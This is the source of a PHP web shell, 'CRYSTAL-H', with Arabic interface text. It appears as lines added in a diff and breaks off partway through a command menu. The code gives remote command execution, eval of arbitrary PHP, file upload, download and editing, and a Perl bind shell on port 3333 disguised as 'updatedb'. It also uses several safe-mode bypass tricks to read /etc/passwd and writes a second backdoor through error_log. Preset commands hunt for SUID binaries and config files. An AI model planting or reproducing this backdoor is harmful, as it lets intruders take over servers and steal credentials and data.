+<font color=#DCE7EF face="Verdana" size="-2">&nbsp;</font></font></font><font face="verdana" color="white"><span lang="en-us"><a title="ÇáÃÏæÇÊ" href="?act=tools"><font color=#CC0000 size="3">Tools</font></a></span></font><a bookmark="minipanel" style="color: #dadada; font-family: verdana; text-decoration: none"><span lang="en-us"><font color=#C0C0C0 face="Wingdings 2" size="5">4</font></span></a><font size="4px" face="verdana" color="white"></a></font></b><b><font face=Verdana size="4px"><font size=-2 face=verdana>
+</font></font></b><b><font size="4px">
+<font size="4px" face="verdana" color="white">
+<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+<font color=#DCE7EF face="Verdana" size="-2"><span lang="en-us">&nbsp;</span> </font></font></font>
+<font face="verdana" color="white"><span lang="en-us">
+<a title="ÇáÊÔÝíÑ" href="?act=decoder"><font color=#CC0000 size="3">Decoder</font></a></span></font><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><span lang="en-us"><font color=#C0C0C0 face="Webdings" size="5">i</font></span></a><font size="3" face="verdana" color="white"></a></font><font size=-2 face=verdana>
+</font>
+</b><b><font size="4px"><font size="4px" face="verdana" color="white">
+<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+<font color=#DCE7EF face="Verdana" size="-2"><span lang="en-us">&nbsp;</span> </font>
+	</font></font><span lang="en-us"><font face="verdana" color="white">
+	<a href="?act=bypass"><font color=#CC0000 size="3">
+<a title="ËÛÑÇÊ ÇáãÑæÑ" href="?act=bypass"><font color="#CC0000">ByPass</font></a></font></a></font><font face="Webdings" size="5" color="#C0C0C0">`</font></span><font size="4px" face="verdana" color="white"></a></font><font size=3 face=verdana>
+</font>
+<font size="4px" face="verdana" color="white">
+<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+<font color=#DCE7EF face="Verdana" size="-2"><span lang="en-us">&nbsp;</span> </font>
+	</font><font face="verdana" color="white"><span lang="en-us">
+<a title="ÇáÅÊÕÇá ÈÞÇÚÏÉ ÇáÈíÇäÇÊ" href="?act=SQL"><font color=#CC0000 size="3">SQL</font></a></span></font></b><font face="Webdings" size="5" color="#C0C0C0">Â</font><b><font size="3" face="verdana" color="white"></a></font></b><font size="3"></font></font><b><font face=Verdana size="4px"><font size=-2 face=verdana>
+</font></font></b><font size="4px"><b>
+<font size="4px" face="verdana" color="white">
+<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+<font color=#DCE7EF face="Verdana" size="-2"><span lang="en-us">&nbsp;</span></font></font></b></font><b><span lang="en-us"><font face="verdana" color="white"><a title="bind shell" href="?act=bindport"><font color=#CC0000 size="3">Bind</font></a></font></span></b><font face="Webdings" size="5" color="#C0C0C0">Â</font><font size="4px"><b><font size="4px" face="verdana" color="white"><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><font color=#DCE7EF face="Verdana" size="-2"> </font>
+	</font></b></font><b><font face="verdana" color="white">
+	</b><b>
+	<a href="?act=help"><span lang="en-us"><font color=#CC0000 size="3">
+<a title="ÇáãÓÇÚÏÉ" href="?act=help"><font color="#CC0000">help</font></a></font></span></a></b></font><b><a title="ÇáãÓÇÚÏÉ" href="?act=help"><font size="4px" face="verdana" color="#CC0000"></a></font></a><font size=3 face=verdana>
+</font><span lang="en-us"><font color="#C0C0C0" face="Webdings" size="5">s</font></span><font face="verdana" color="white"><span lang="en-us"><font color=#CC0000 size="3"><a title="ÇÞÑÇÁäí" href="?act=about"><font color="#CC0000">about</font></a></font></span></a></font></a><font size=3 face=verdana>
+</font></b><span lang="en-us"><font size=5 face=Wingdings color="#C0C0C0">
+?</font></span></p>
+<p><font size="4px"><font size=-2 face=verdana color=white><font size="4px" face="Verdana" color="white"><a bookmark="minipanel" style="font-weight: normal; font-family: verdana; text-decoration: none"><font color=#DCE7EF face="Verdana" size="-2">
+[</font></a></font><a bookmark="minipanel" style="font-weight: normal; font-family: verdana; text-decoration: none"><font face="Webdings" color="#DCE7EF">j</font></a><font color=#CC0000 face="Verdana" size="-2"> </font>
+
+<font size="4px">
+	<font size="4px" face="verdana" color="white"><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+	<font size=-2 face=verdana color=#CC0000>server </font>
+	<font size="1" face="verdana" color="#CC0000">:</font><font face=Verdana size=-2 color="#DCE7EF"> <?php echo $SERVER_NAME; ?>
+	</font></a></font>
+</a></font>
+</font><b>
+<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+<font color=#DCE7EF size="-2" face="verdana">]&nbsp; </font>
+<font size=-2 face=verdana color=white>
+	<font size="4px" face="verdana" color="white">
+	<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+	<font face=Verdana size=-2 color="#008000">
+	CGI v</font><font size="1" face="verdana" color="#DCE7EF">:</font><font face=Verdana size=-2 color="#DCE7EF"> <?php echo $GATEWAY_INTERFACE; ?>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </font>
+	<font face=Verdana size=-2 color="#008000">&nbsp;HTTP v</font></a></font><font size="1" face="verdana">:</font><font size="4px" face="verdana" color="DCE7EF"><font face=Verdana size=-2> <?php echo $SERVER_PROTOCOL; ?></font><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><font face=Verdana size=-2><font size=-2 face=verdana color=#DCE7EF>&nbsp;</font><font size=-2 face=verdana color=#008000>Mail
+admin</font></font><font size="1" face="verdana" color="#DCE7EF">:</font><font face=Verdana size=-2 color="#DCE7EF"> <?php echo $SERVER_ADMIN; ?>&nbsp;&nbsp;&nbsp;&nbsp; </font><font face=Verdana size=-2 color="black"> &nbsp; </font></a></font>
+</font>
+	</b>
+</font></a>&nbsp;&nbsp;<br>
+
+<font size="4px">
+<b>
+<font size=-2 face=verdana color=white>
+	<font face=Verdana size=-2 color="#CC0000">
+	<a bookmark="minipanel" style="font-weight: normal; font-family: verdana; text-decoration: none">
+	<font face="Wingdings" size="3" color="#000000">:</font></a></font><font size=-2 face=verdana color=#CC0000>&nbsp;&nbsp;</font><font face="Verdana" size="-2" color="#CC0000">IP</font><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><font size="4px" face="verdana" color="white"><font face=Verdana size=-2>
+	</font><font size="1" face="verdana">&nbsp;</font></font><font size="1" face="verdana" color="#CC0000">SERVER:</font><font face=Verdana size=-2 color="#DCE7EF"> <?php echo $SERVER_ADDR; ?>
+	</font>
+	</a>
+
+<font size="4px">
+</a>
+<font size=-2 face=verdana color=white>
+
+	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+</font></font>
+	<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+	<font size="4px"><font face=Verdana size=-2 color="black">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+	</font>
+	<font size="4px" face="verdana" color="white"><font face=Verdana size=-2 color="#008000">
+port
+	</font><font size="1" face="verdana" color="#000000">:</font><font face=Verdana size=-2 color="red"> <?php echo $SERVER_PORT; ?>
+	</font></font>
+	</font>
+	</font>
+	</b>
+</font></p></td></tr></table>
+<?
+if ($act == "help") {echo "<center><b>ÇáÓáÇã Úáíßã æÑÍãÉ Çááå æÈÑßÇÊå<br><br>ÚÒíÒí ÇáãÓÊÎÏã<br>ÇÐÇ ÇÑÏÊ ÇáãÓÇÚÏÉ ÇÖÛØ Úáì ÇÓã ÇáÎíÇÑ ÇáãæÖÍ ÈÇááæä ÇáÇÒÑÞ<br>æÓÊÙåÑ áß ãÚáæãÇÊ ÇáÎíÇÑ   </a>.</b>";}
+if ($act == "bindport"){
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
+<b>/bin/bash</b><input type=\"text\" name=\"installpath\" value=\"" . getcwd() . "\">
+<b>Port</b><input type=\"text\" name=\"port\" value=\"3333\">
+<INPUT type=\"hidden\" name=\"installbind\" value=\"yes\">
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
+<INPUT type=\"submit\" value=\"Connect\"></form></div>";
+}
+if ($act == "tools"){
+	echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
+File to edit:
+<input type=\"text\" name=\"editfile\" >
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
+<INPUT type=\"submit\" value=\"Edit\"></form></div>";
+ echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
+<table id=tb><tr><td>
+<INPUT type=\"hidden\" name=\"php\" value=\"yes\">
+<INPUT type=\"submit\" value=\"eval code\" id=input></form></div></td></table>";
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<table id=tb><tr><td>Download here <b>from</b>:
+<INPUT type=\"text\" name=\"filefrom\" size=30 value=\"http://\">
+<b>-->>:</b>
+<INPUT type=\"text\" name=\"fileto\" size=30>
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\"></td><td>
+<INPUT type=\"submit\" value=\"Download\" id=input></td></tr></table></form></div>";
+}
+if ($act == "about") {echo "<center><b>Coding by:<br><br>Super-Crystal<br>&<br>Mohajer22<br>-----<br>Thanks <br>TrYaG Team <br> ArabSecurityCenter Team <br>CRYSTAL-H Version:0 Beta phpshell code<br>Saudi Arabic  </a>.</b>";}
+
+if ($act == "bind") {echo "<center><b>CRYSTAL-H:<br><br>-Connect Þã ÈÇáÖÛØ Úáì ÎíÇÑ.<br>.- ÈÚÏ ãÇíÊã ÇäÒÇá ÇáÓßÑíÈÊ ÈÇáãÌáÏ<br>.-ÊæÌå áÇÏÇÉ ÇáäÊ ßÇÊ æÊÕäÊ Úáì<br>nc -lp 3333ÈßÊÇÈÉ ÇáãäÝÐ - <br>ÇáÓßÑíÈÊ ÈáÛÉ ÇáÈíÑá <br>Bind port to  :<br> bind shell æåäíÆÇ ð áß   </a>.</b>";}
+
+if ($act == "command") {echo "<center><b>CRYSTAL-H:<br><br>áÃÎÊíÇÑ ÇáÇæÇãÑ ÇáÌÇåÒå  Select ------ x  ÇÖÛØ Úáì ÇáÎíÇÑ<br>.- æÇÐÇ ÇÑÏÊ ßÊÇÈå  ÇáÇæÇãÑ ÈäÝÓß ÞÏ ÊßÊÝí ÈÇáÎíÇÑ<br>Command   </a>.</b>";}
+
+if ($act == "team") {echo "<center><b>Arab Security Center Team<br><br>Super-Crystal<br>Medo-HaCKer<br>Anaconda<br>Alsb0r<br> ReeM-HaCK <br>NoOFa <br> AL-Alame<br>The YounG HackeR<br>Anti-Hack<br>Thanks  </a>.</b>";}
+if (array_key_exists('image', $_GET)) {
+	header('Content-Type: image/gif');
+	die(getimage($_GET['image']));
+}
+
+if ($act == "bypass") {
+echo "
+<form action=\"$REQUEST_URI\" method=\"POST\">
+<table id=tb><tr><td>Execute:<INPUT type=\"text\" name=\"cmd\" size=30 value=\"$cmd\"></td></tr></table>
+";
+echo ("<FONT COLOR=\"RED\"> bypass safemode with copy </FONT>");
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<table id=tb><tr><td>read file :
+<INPUT type=\"text\" name=\"copy\" size=30 value=\"/etc/passwd\">
+<INPUT type=\"submit\" value=\"show\" id=input></td></tr></table></form></div>";
+echo ("<FONT COLOR=\"RED\"> bypass safemode with CuRl</FONT>");
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<table id=tb><tr><td>read file :
+<INPUT type=\"text\" name=\"curl\" size=30 value=\"/etc/passwd\">
+<INPUT type=\"submit\" value=\"show\" id=input></td></tr></table></form></div>";
+echo ("<FONT COLOR=\"RED\"> bypass safemode with imap()</FONT>");
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<table id=tb><tr><td><select name=switch><option value=file>View file</option><option value=dir>View dir</option></select>
+<INPUT type=\"text\" name=\"string\" size=30 value=\"/etc/passwd\">
+<INPUT type=\"submit\" value=\"show\" id=input></td></tr></table></form></div>";
+echo ("<FONT COLOR=\"RED\"> bypass safemode with id()</FONT>");
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<table id=tb><tr><td>
+<select name=plugin><option>cat /etc/passwd</option></select>
+<INPUT type=\"submit\" value=\"Show\" id=input></td></tr></table></form></div>";
+echo ("<FONT COLOR=\"RED\"> Exploit: error_log()</FONT>");
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<table id=tb><tr><td>
+<INPUT type=\"text\" name=\"ERORR\" size=30 value=\"\">
+<INPUT type=\"submit\" value=\"Write\" id=input></td></tr></table></form></div>";
+}
+if ($act == "decoder"){
+echo ("<FONT COLOR=\"RED\"> replace Chr()</FONT>");
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<table id=tb><tr><td>
+<textarea name=\"Mohajer22\" cols=\"50\" rows=\"15\" wrar=\"off\">
+</textarea><br>
+<INPUT type=\"submit\" value=\"Replace\" id=input></td></tr></table></form></div>";
+}
+if ($act == "SQL"){
+echo ("<FONT COLOR=\"RED\">   MySQL    </FONT>");
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<table id=tb><tr><td> Username :
+<INPUT type=\"text\" name=\"username\" size=30 value=\"\">\n
+password :
+<INPUT type=\"password\" name=\"password\" size=30 value=\"\">\n
+<input type=submit value='Enter'>\n
+<input type=reset value='Clear'></td></tr></table></form></div>";
+}
+?>
+
+
+
+<br>
+<TABLE style="BORDER-COLLAPSE: collapse; color:#000000" cellSpacing=0 borderColorDark=#DCE7EF cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#C0C0C0 border=1><tr>
+	<td width="100%" valign="top" style="color: #00000" bgcolor="#000000">
+	<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+	<TABLE style="BORDER-COLLAPSE: collapse; font-family:Verdana; font-size:11px; color:#000000; background-color:#0000000" height=1 cellSpacing=0 borderColorDark=#000000 cellPadding=0 width="100%" bgColor=#000000 borderColorLight=#DCE7EF border=1>
+	<tr style="font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; color: red; background-color: #0000000">
+	<td width="990" height="1" valign="top" style="border:1px solid #00000; font-family: Verdana; color: #000000; font-size: 11px; "><p align="center">
+	&nbsp;</p>
+	<p align="center">&nbsp;<table style="font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; color: red; background-color: #0000000">
+		<tr style="font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; color: red; background-color: #0000000">
+			<td style="font-size: 13px; font-family: verdana, arial, helvetica; color: red; background-color: #0000000">
+<?php
+// chr() //
+if(empty($_POST['Mohajer22'])){
+} else {
+$m=$_POST['Mohajer22'];
+$m=str_replace(" ","",$m);
+$m=str_replace("(","",$m);
+$m=str_replace(")","",$m);
+$m=str_replace(".",";",$m);
+$m=str_replace("chr","&#",$m);
+$m=str_replace(" ","",$m);
+echo $m ;
+}
+// ERORR //
+if(empty($_POST['ERORR'])){
+} else {
+$ERORR=$_POST['ERORR'];
+echo  error_log("
+<html>
+<head>
+<title> Exploit: error_log() By * Super-Crystal  * </title>
+<body bgcolor=\"#000000\">
+<table Width='100%' height='10%' bgcolor='#8C0404' border='1'>
+<tr>
+<td><center><font size='6' color='#BBB516'> By  * Super-Crystal * TrYaG Team</font></center></td>
+</tr>
+</table>
+<font color='#FF0000'>
+</head>
+<?
+if(\$fileup == \"\"){
+ECHO \" reade for up \";
+}else{
+\$path= exec(\"pwd\");
+\$path .= \"/\$fileup_name\";
+\$CopyFile = copy(\$fileup,\"\$path\");
+if(\$CopyFile){
+echo \" up ok \";
+}else{
+echo \" no up \";
+}
+}
+if(empty(\$_POST['m'])){
+} else {
+\$m=\$_POST['m'];
+echo  system(\$m);
+}
+if(empty(\$_POST['cmd'])){
+} else {
+\$h=  \$_POST['cmd'];
+ print include(\$h) ;
+   }
+
+
+?>
+<form method='POST' enctype='multipart/form-data' action='Super-Crystal.php'>
+<input type='file' name='fileup' size='20'>
+<input type='submit' value='  up  '>
+</form>
+<form method='POST'  action='Super-Crystal.php'>
+<input type='cmd' name='cmd' size='20'>
+<input type='submit' value='  open (shill.txt) '>
+</form>
+<form method='POST' enctype='multipart/form-data' action='Super-Crystal.php'>
+<input type='text' name='m' size='20'>
+<input type='submit' value='  run  '>
+<input type='reset' value=' reset '>
+</form>
+", 3,$ERORR);
+}
+// id //
+if ($_POST['plugin'] ){
+
+
+                                  switch($_POST['plugin']){
+                                 case("cat /etc/passwd"):
+                                           for($uid=0;$uid<6000;$uid++){   //cat /etc/passwd
+                                        $ara = posix_getpwuid($uid);
+                                                if (!empty($ara)) {
+                                                  while (list ($key, $val) = each($ara)){
+                                                    print "$val:";
+                                                  }
+                                                  print "<br>";
+                                                }
+                                        }
+
+                                break;
+
+
+                                                }
+                                               }
+
+// imap //
+$string = !empty($_POST['string']) ? $_POST['string'] : 0;
+$switch = !empty($_POST['switch']) ? $_POST['switch'] : 0;
+
+if ($string && $switch == "file") {
+$stream = imap_open($string, "", "");
+
+$str = imap_body($stream, 1);
+if (!empty($str))
+echo "<pre>".$str."</pre>";
+imap_close($stream);
+} elseif ($string && $switch == "dir") {
+$stream = imap_open("/etc/passwd", "", "");
+if ($stream == FALSE)
+die("Can't open imap stream");
+$string = explode("|",$string);
+if (count($string) > 1)
+$dir_list = imap_list($stream, trim($string[0]), trim($string[1]));
+else
+$dir_list = imap_list($stream, trim($string[0]), "*");
+echo "<pre>";
+for ($i = 0; $i < count($dir_list); $i++)
+echo "$dir_list[$i]"."<p>&nbsp;</p>" ;
+echo "</pre>";
+imap_close($stream);
+}
+// CURL //
+if(empty($_POST['curl'])){
+} else {
+$m=$_POST['curl'];
+$ch =
+curl_init("file:///".$m."\x00/../../../../../../../../../../../../".__FILE__);
+curl_exec($ch);
+var_dump(curl_exec($ch));
+}
+
+// copy//
+$u1p="";
+$tymczas="";
+if(empty($_POST['copy'])){
+} else {
+$u1p=$_POST['copy'];
+$temp=tempnam($tymczas, "cx");
+if(copy("compress.zlib://".$u1p, $temp)){
+$zrodlo = fopen($temp, "r");
+$tekst = fread($zrodlo, filesize($temp));
+fclose($zrodlo);
+echo "".htmlspecialchars($tekst)."";
+unlink($temp);
+} else {
+die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
+<B>".htmlspecialchars($u1p)."</B> dosen't exists or you don't have
+access.</CENTER></FONT>");
+}
+}
+
+@$dir = $_POST['dir'];
+$dir = stripslashes($dir);
+
+@$cmd = $_POST['cmd'];
+$cmd = stripslashes($cmd);
+$REQUEST_URI = $_SERVER['REQUEST_URI'];
+$dires = '';
+$files = '';
+
+
+
+
+if (isset($_POST['port'])){
+$bind = "
+#!/usr/bin/perl
+
+\$port = {$_POST['port']};
+\$port = \$ARGV[0] if \$ARGV[0];
+exit if fork;
+$0 = \"updatedb\" . \" \" x100;
+\$SIG{CHLD} = 'IGNORE';
+use Socket;
+socket(S, PF_INET, SOCK_STREAM, 0);
+setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
+bind(S, sockaddr_in(\$port, INADDR_ANY));
+listen(S, 50);
+while(1)
+{
+	accept(X, S);
+	unless(fork)
+	{
+		open STDIN, \"<&X\";
+		open STDOUT, \">&X\";
+		open STDERR, \">&X\";
+		close X;
+		exec(\"/bin/sh\");
+	}
+	close X;
+}
+";}
+
+function decode($buffer){
+
+return  convert_cyr_string ($buffer, 'd', 'w');
+
+}
+
+
+
+function execute($com)
+{
+
+ if (!empty($com))
+ {
+  if(function_exists('exec'))
+   {
+    exec($com,$arr);
+   echo implode('
+',$arr);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    echo shell_exec($com);
+
+
+   }
+  elseif(function_exists('system'))
+{
+
+    echo system($com);
+}
+  elseif(function_exists('passthru'))
+   {
+
+    echo passthru($com);
+
+   }
+}
+
+}
+
+
+function perms($mode)
+{
+
+if( $mode & 0x1000 ) { $type='p'; }
+else if( $mode & 0x2000 ) { $type='c'; }
+else if( $mode & 0x4000 ) { $type='d'; }
+else if( $mode & 0x6000 ) { $type='b'; }
+else if( $mode & 0x8000 ) { $type='-'; }
+else if( $mode & 0xA000 ) { $type='l'; }
+else if( $mode & 0xC000 ) { $type='s'; }
+else $type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-';
+$owner["write"] = ($mode & 00200) ? 'w' : '-';
+$owner["execute"] = ($mode & 00100) ? 'x' : '-';
+$group["read"] = ($mode & 00040) ? 'r' : '-';
+$group["write"] = ($mode & 00020) ? 'w' : '-';
+$group["execute"] = ($mode & 00010) ? 'x' : '-';
+$world["read"] = ($mode & 00004) ? 'r' : '-';
+$world["write"] = ($mode & 00002) ? 'w' : '-';
+$world["execute"] = ($mode & 00001) ? 'x' : '-';
+if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
+if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
+if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
+$s=sprintf("%1s", $type);
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
+return trim($s);
+}
+
+
+
+
+
+
+if(isset($_POST['post']) and $_POST['post'] == "yes" and @$HTTP_POST_FILES["userfile"][name] !== "")
+{
+copy($HTTP_POST_FILES["userfile"]["tmp_name"],$HTTP_POST_FILES["userfile"]["name"]);
+}
+
+if((isset($_POST['fileto']))||(isset($_POST['filefrom'])))
+
+{
+$data = implode("", file($_POST['filefrom']));
+$fp = fopen($_POST['fileto'], "wb");
+fputs($fp, $data);
+$ok = fclose($fp);
+if($ok)
+{
+$size = filesize($_POST['fileto'])/1024;
+$sizef = sprintf("%.2f", $size);
+print "<center><div id=logostrip>Download - OK. (".$sizef."??)</div></center>";
+}
+else
+{
+print "<center><div id=logostrip>Something is wrong. Download - IS NOT OK</div></center>";
+}
+}
+
+if (isset($_POST['installbind'])){
+
+if (is_dir($_POST['installpath']) == true){
+chdir($_POST['installpath']);
+$_POST['installpath'] = "temp.pl";}
+
+
+$fp = fopen($_POST['installpath'], "w");
+fwrite($fp, $bind);
+fclose($fp);
+
+exec("perl " . $_POST['installpath']);
+chdir($dir);
+
+
+}
+
+
+@$ef = stripslashes($_POST['editfile']);
+if ($ef){
+$fp = fopen($ef, "r");
+$filearr = file($ef);
+
+
+
+$string = '';
+$content = '';
+foreach ($filearr as $string){
+$string = str_replace("<" , "&lt;" , $string);
+$string = str_replace(">" , "&gt;" , $string);
+$content = $content . $string;
+}
+
+echo "<center><div id=logostrip>Edit file: $ef </div><form action=\"$REQUEST_URI\" method=\"POST\"><textarea name=content cols=100 rows=20>$content</textarea>
+<input type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
+<input type=\"hidden\" name=\"savefile\" value=\"{$_POST['editfile']}\"><br>
+<input type=\"submit\" name=\"submit\" value=\"Save\" id=input></form></center>";
+fclose($fp);
+}
+
+if(isset($_POST['savefile'])){
+
+$fp = fopen($_POST['savefile'], "w");
+$content = stripslashes($content);
+fwrite($fp, $content);
+fclose($fp);
+echo "<center><div id=logostrip>saved -OK!</div></center>";
+
+}
+
+
+if (isset($_POST['php'])){
+
+echo "<center><div id=logostrip>eval code<br><form action=\"$REQUEST_URI\" method=\"POST\"><textarea name=phpcode cols=100 rows=20></textarea><br>
+<input type=\"submit\" name=\"submit\" value=\"Exec\" id=input></form></center></div>";
+}
+
+
+
+if(isset($_POST['phpcode'])){
+
+echo "<center><div id=logostrip>Results of PHP execution<br><br>";
+@eval(stripslashes($_POST['phpcode']));
+echo "</div></center>";
+
+
+}
+
+
+if ($cmd){
+
+if($sertype == "winda"){
+ob_start();
+execute($cmd);
+$buffer = "";
+$buffer = ob_get_contents();
+ob_end_clean();
+}
+else{
+ob_start();
+echo decode(execute($cmd));
+$buffer = "";
+$buffer = ob_get_contents();
+ob_end_clean();
+}
+
+if (trim($buffer)){
+echo "<center><div id=logostrip>Command: $cmd<br><textarea cols=100 rows=20>";
+echo decode($buffer);
+echo "</textarea></center></div>";
+}
+
+}
+$arr = array();
+
+$arr = array_merge($arr, glob("*"));
+$arr = array_merge($arr, glob(".*"));
+$arr = array_merge($arr, glob("*.*"));
+$arr = array_unique($arr);
+sort($arr);
+echo "<table><tr><td>Name</td><td><a title=\"Type of object\">Type</a></td><td>Size</td><td>Last access</td><td>Last change</td><td>Perms</td><td><a title=\"If Yes, you have write permission\">Write</a></td><td><a title=\"If Yes, you have read permission\">Read</a></td></tr>";
+
+foreach ($arr as $filename) {
+
+if ($filename != "." and $filename != ".."){
+
+if (is_dir($filename) == true){
+$directory = "";
+$directory = $directory . "<tr><td>$filename</td><td>" . filetype($filename) . "</td><td></td><td>" . date("G:i j M Y",fileatime($filename)) . "</td><td>" . date("G:i j M Y",filemtime($filename)) . "</td><td>" . perms(fileperms($filename));
+if (is_writable($filename) == true){
+$directory = $directory . "<td>Yes</td>";}
+else{
+$directory = $directory . "<td>No</td>";
+
+}
+
+if (is_readable($filename) == true){
+$directory = $directory . "<td>Yes</td>";}
+else{
+$directory = $directory . "<td>No</td>";
+}
+$dires = $dires . $directory;
+}
+
+if (is_file($filename) == true){
+$file = "";
+$file = $file . "<tr><td><a onclick=tag('$filename')>$filename</a></td><td>" . filetype($filename) . "</td><td>" . filesize($filename) . "</td><td>" . date("G:i j M Y",fileatime($filename)) . "</td><td>" . date("G:i j M Y",filemtime($filename)) . "</td><td>" . perms(fileperms($filename));
+if (is_writable($filename) == true){
+$file = $file . "<td>Yes</td>";}
+else{
+$file = $file . "<td>No</td>";
+}
+
+if (is_readable($filename) == true){
+$file = $file . "<td>Yes</td></td></tr>";}
+else{
+$file = $file . "<td>No</td></td></tr>";
+}
+$files = $files . $file;
+}
+
+
+
+}
+
+
+
+}
+echo $dires;
+echo $files;
+echo "</table><br>";
+
+
+
+
+echo "
+<form action=\"$REQUEST_URI\" method=\"POST\">
+Command:<INPUT type=\"text\" name=\"cmd\" size=30 value=\"$cmd\">
+
+
+Directory:<INPUT type=\"text\" name=\"dir\" size=30 value=\"";
+
+echo getcwd();
+echo "\">
+<INPUT type=\"submit\" value=\"..Exec..\"></form>";
+
+
+
+
+
+if (ini_get('safe_mode') == 1){echo "<br><font size=\"3\"color=\"#cc0000\"><b>SAFE MOD IS ON<br>
+Including from here: "
+. ini_get('safe_mode_include_dir') . "<br>Exec here: " . ini_get('safe_mode_exec_dir'). "</b></font>";}
+
+
+
+
+?>
+
+
+</td></tr></table></p></td></tr></table>
+	</a><br><hr size="1" noshade><p align="right">
+	<font face="Wingdings 3" size="5" color="#DCE7EF">&lt;</font><b><select name="act"><option value="ls">
+	With selected:</option><option value="delete">Delete</option><option value="archive">
+	Archive</option><option value="cut">Cut</option><option value="copy">Copy</option><option value="unselect">
+	Unselect</option></select>&nbsp;<input type="submit" value="Confirm"></p></form></td></tr></table><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr><td width="100%" height="1" valign="top" colspan="2" bgcolor="#000000"><p align="center">
+	<b>
+	:: </b>
+	<font face=Verdana size=-2><a href="?act=command">Executed command</a></font><b> ::</b></p></td></tr><tr><td width="50%" height="1" valign="top" bgcolor="#000000" style="color: #000000; border: 1px solid #000000"><center><b>
+	<?
+	echo "
+<form action=\"$REQUEST_URI\" method=\"POST\">
+Command:<INPUT type=\"text\" name=\"cmd\" size=30 value=\"$cmd\">";
+?>
+		<input type="submit" name="submit1" value="Command" style="border: 1px solid #000000"><font face="Wingdings 3" color="#DCE7EF" size="3">f</font></form><p>
+	&nbsp;</p>
+	</td>
+	<td width="50%" height="1" valign="top" bgcolor="#000000" style="color: #000000"><center>
+	<form action="?act=cmd" method="POST"><input type="hidden" name="act" value="cmd"><input type="hidden" name="d" value="c:/appserv/www/shells/">
+		<font color="#DCE7EF">Select</font><font face="Wingdings 3" color="#DCE7EF" size="3">g</font><select name="cmd" size="1"><option value="ls -la">
+		-----------------------------------------------------------</option>
+		<option value="ls -la /var/lib/mysq">ls MySQL</option>
+		<option value="which curl">cURL ?</option>
+		<option value="which wget">Wget ?</option>
+		<option value="which lynx">Lynx ?</option>
+		<option value="which links">links ?</option>
+		<option value="which fetch">fetch ?</option>
+		<option value="which GET">GET ?</option>
+		<option value="which per">Perl ?</option>
+		<option value="gcc --help">C gcc Help ?</option>
+		<option value="tar --help">tar Help ?</option>
+		<option value="cat /etc/passwd">Get passwd !!!</option>
+		<option value="cat /etc/hosts">Get hosts</option>
+		<option value="perl --help">Perl Help ?</option>
+		<option value="find / -type f -perm -04000 -ls">
+		find all suid files</option><option value="find . -type f -perm -04000 -ls">
+		find suid files in current dir</option><option value="find / -type f -perm -02000 -ls">
+		find all sgid files</option><option value="find . -type f -perm -02000 -ls">
+		find sgid files in current dir</option><option value="find / -type f -name config.inc.php">
+		find config.inc.php files</option><option value="find / -type f -name &quot;config*&quot;">
